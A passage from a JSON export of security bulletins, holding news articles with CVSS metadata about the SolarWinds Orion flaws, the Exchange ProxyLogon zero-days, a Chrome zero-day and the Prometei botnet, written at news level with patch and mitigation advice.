data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.\n\nConsumers have no direct control over the security of the personal data they disclose to online providers. However, we can limit the damage of a security breach at an online provider by ensuring that they create passwords that are unique and hard to guess, or use a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.\n\nIt's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).", "cvss3": {}, "published": "2019-11-29T10:00:12", "type": "securelist", "title": "IT threat evolution Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-11-29T10:00:12", "id": "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "href": "https://securelist.com/it-threat-evolution-q3-2019/95268/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:09", "description": "[](<https://thehackernews.com/images/-Z2pOVuMPPo4/YBqI9jJR7DI/AAAAAAAABqs/gEmdlXvL7Ko6f_bSYxm6gB5dzNGt0EtawCLcBGAsYHQ/s0/solarwinds.jpg>)\n\nCybersecurity researchers on Wednesday disclosed three severe security vulnerabilities impacting SolarWinds products, the most severe of which could have been exploited to achieve remote code execution with elevated privileges.\n\nTwo of the flaws (CVE-2021-25274 and CVE-2021-25275) were identified in the SolarWinds Orion Platform, while a third separate weakness (CVE-2021-25276) was found in the company's Serv-U FTP server for Windows, [said](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/full-system-control-with-new-solarwinds-orion-based-and-serv-u-ftp-vulnerabilities/>) cybersecurity firm Trustwave in a technical analysis.\n\nNone of the three vulnerabilities are believed to have been exploited in any \"in the wild\" attacks or during the unprecedented [supply chain attack](<https://thehackernews.com/2021/01/heres-how-solarwinds-hackers-stayed.html>) targeting the Orion Platform that came to light last December.\n\nThe two sets of vulnerabilities in Orion and Serv-U FTP were disclosed to SolarWinds on December 30, 2020, and January 4, 2021, respectively, following which the company resolved the issues on January 22 and January 25.\n\nIt's highly recommended that users install the latest versions of [Orion Platform](<https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/release_notes/orion_platform_2020-2-4_release_notes.htm>) and Serv-U FTP ([15.2.2 Hotfix 1](<https://downloads.solarwinds.com/solarwinds/Release/HotFix/Serv-U-15.2.2-Hotfix-1.zip>)) to mitigate the risks associated with the flaws. Trustwave said it intends to release a proof-of-concept (PoC) code next week on February 9.\n\n### Complete Control Over Orion \n\nChief among the vulnerabilities uncovered by Trustwave includes improper use of Microsoft Messaging Queue ([MSMQ](<https://docs.microsoft.com/en-us/previous-versions/windows/desktop/msmq/ms711472\\(v=vs.85\\)>)), which is used heavily by the SolarWinds Orion Collector Service, thereby allowing unauthenticated users to send messages to such queues over TCP port 1801 and eventually attain RCE by chaining it with another unsafe deserialization issue in the code that handles incoming messages.\n\n\"Given that the message processing code runs as a Windows service configured to use LocalSystem account, we have complete control of the underlying operating system,\" Trust researcher Martin Rakhmanov said.\n\nThe patch released by SolarWinds (Orion Platform [2020.2.4](<https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/release_notes/orion_platform_2020-2-4_release_notes.htm>)) addresses the bug with a digital signature validation step that's performed on arrived messages to ensure that unsigned messages are not processed further, but Rakhmanov cautioned that the MSMQ is still unauthenticated and allows anyone to send messages to it.\n\n[](<https://thehackernews.com/images/-F7DwIAuzUyM/YBqJY6UIcaI/AAAAAAAABq0/CHPykJh7QgwHOpRl9smMLqxIIujD4Jd6wCLcBGAsYHQ/s0/hacker.jpg>)\n\nThe second vulnerability, also found in the Orion Platform, concerns the insecure manner in which credentials of the backend database (named \"SOLARWINDS_ORION\") is stored in a configuration file, resulting in a local, unprivileged user take complete control over the database, steal information, or even add a new admin-level user to be used inside SolarWinds Orion products.\n\nLastly, a [flaw](<https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28396>) in SolarWinds Serv-U FTP Server 15.2.1 for Windows could allow any attacker that can log in to the system locally or via Remote Desktop to drop a file that defines a new admin user with full access to the C:\\ drive, which can then be leveraged by logging in as that user via FTP and read or replace any file on the drive.\n\n### U.S. Department of Agriculture Targeted Using New SolarWinds Flaw\n\nNews of the three vulnerabilities in SolarWinds products comes on the heels of reports that alleged Chinese threat actors exploited a previously undocumented flaw in the company's software to break into the National Finance Center, a federal payroll agency inside the U.S. Department of Agriculture.\n\nThis flaw is said to be different from those that were abused by suspected Russian threat operatives to compromise SolarWinds Orion software that was then distributed to as many as 18,000 of its customers, according to [Reuters](<https://www.reuters.com/article/us-cyber-solarwinds-china-exclusive/exclusive-suspected-chinese-hackers-used-solarwinds-bug-to-spy-on-u-s-payroll-agency-sources-idUSKBN2A22K8>).\n\nIn late December, Microsoft [said](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) a second hacker collective might have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems by taking advantage of an [authentication bypass vulnerability](<https://thehackernews.com/2020/12/a-new-solarwinds-flaw-likely-had-let.html>) in the Orion API to execute arbitrary commands.\n\nSolarWinds [issued a patch](<https://thehackernews.com/2020/12/a-new-solarwinds-flaw-likely-had-let.html>) to address the vulnerability on December 26, 2020.\n\nLast week, Brandon Wales, acting director of the U.S. Cybersecurity and Infrastructure Agency (CISA), [said](<https://www.wsj.com/articles/suspected-russian-hack-extends-far-beyond-solarwinds-software-investigators-say-11611921601>) nearly 30% of the private-sector and government agencies linked to the intrusion campaign had no direct connection to SolarWinds, implying that the attackers used a [variety of ways](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>) to breach target environments.\n\nThe overlap in the twin espionage efforts notwithstanding, the campaigns are yet another sign that advanced persistent threat (APT) groups are increasingly focusing on the [software supply chain](<https://thehackernews.com/2021/02/a-new-software-supplychain-attack.html>) as a conduit to strike high-value targets such as corporations and government agencies.\n\nThe trust and ubiquity of software such as those from SolarWinds or Microsoft make them a lucrative target for attackers, thus underscoring the need for organizations to be on the lookout for potential dangers stemming from relying on third-party tools to manage their platforms and services.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-03T11:31:00", "type": "thn", "title": "3 New Severe Security Vulnerabilities Found In SolarWinds Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276"], "modified": "2021-02-05T04:43:57", "id": "THN:A16295D1572D6F721B7A8CC6EB7690FA", "href": "https://thehackernews.com/2021/02/3-new-severe-security-vulnerabilities.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-AxSsNt-9gYo/YD838gSOOTI/AAAAAAAAB7Q/IuSgG26w0NU-eyKMabZMnUfb7QBDyHkUgCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nMicrosoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. \u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some of the customers compromised Exchange servers had been deployed with a crypto-mining software called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), a malware documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. They can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-QHv1N-h4fZY/YD8letBQzWI/AAAAAAAAB64/E1KslMnXt0oEcr7e27y2idTnPPl_nm3VQCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\nExactly a month after [patching](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) an actively exploited zero-day flaw in Chrome, Google today rolled out fixes for yet another zero-day vulnerability in the world's most popular web browser that it says is being abused in the wild.\n\nChrome 89.0.4389.72, released by the search giant for Windows, Mac, and Linux on Tuesday, comes with a total of 47 security fixes, the most severe of which concerns an \"object lifecycle issue in audio.\"\n\nTracked as CVE-2021-21166, the security flaw is one of the two bugs reported last month by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. A separate object lifecycle flaw, also identified in the audio component, was reported to Google on February 4, the same day the stable version of Chrome 88 became available.\n\nWith no additional details, it's not immediately clear if the two security shortcomings are related.\n\n[](<https://thehackernews.com/images/--VPerofAuok/YD8mK08wMrI/AAAAAAAAB7I/VkM_Pg08vFQEvCxV3HbTbaDEd1HRja87QCLcBGAsYHQ/s0/hacking.jpg>)\n\nGoogle acknowledged that an exploit for the vulnerability exists in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n\"Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [said](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>).\n\nThis is the second zero-day flaw in Chrome that Google has addressed since the start of the year.\n\nOn February 4, the company [issued a fix](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) for an actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine. Additionally, Google last year [resolved five Chrome zero-days](<https://thehackernews.com/2020/11/two-new-chrome-0-days-under-active.html>) that were actively exploited in the wild in a span of one month between October 20 and November 12.\n\nChrome users can update to the latest version by heading to Settings &gt; Help &gt; About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T06:03:00", "type": "thn", "title": "New Chrome 0-day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166"], "modified": "2021-03-13T02:55:42", "id": "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "href": "https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/---oICK3YQu8/YIJ50RG8cxI/AAAAAAAACWY/KkCLoHke1SsfzdcENBXnq3d4jAZlau0ggCLcBGAsYHQ/s0/malware.jpg>)\n\nAttackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research.\n\n\"Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more,\" Boston-based cybersecurity firm Cybereason [said](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) in an analysis summarizing its findings.\n\nFirst documented by Cisco Talos in July 2020, [Prometei](<https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html>) is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and \"increase the amount of systems participating in its Monero-mining pool.\"\n\n\"Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network,\" Cybereason senior threat researcher Lior Rochberger said, adding it's \"built to interact with four different command-and-control (C2) servers which strengthens the botnet's infrastructure and maintains continuous communications, making it more resistant to takedowns.\"\n\nThe intrusions take advantage of the recently patched vulnerabilities in [Microsoft Exchange Servers](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) with the goal of abusing the processing power of the Windows systems to mine Monero.\n\nIn the attack sequence observed by the firm, the adversary was found exploiting Exchange server flaws CVE-2021-27065 and CVE-2021-26858 as an initial compromise vector to install the China Chopper web shell and gain backdoor ingress to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server. \n\n[](<https://thehackernews.com/images/-QPt-u63tvwA/YIJ6AaW7GPI/AAAAAAAACWg/z8_YGp_eggY-c6gUKoOyrf5D3cZtnDdzwCLcBGAsYHQ/s0/malware.jpg>)\n\nRecent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including an additional module called \"Microsoft Exchange Defender\" that masquerades as a legitimate Microsoft product, which likely takes care of removing other competing web shells that may be installed on the machine so that Prometei gets access to the resources necessary to mine cryptocurrency efficiently.\n\nInterestingly, newly unearthed evidence gathered from [VirusTotal](<https://www.virustotal.com/gui/file/cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256/details>) [artifacts](<https://www.virustotal.com/gui/file/fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f/details>) has revealed that the 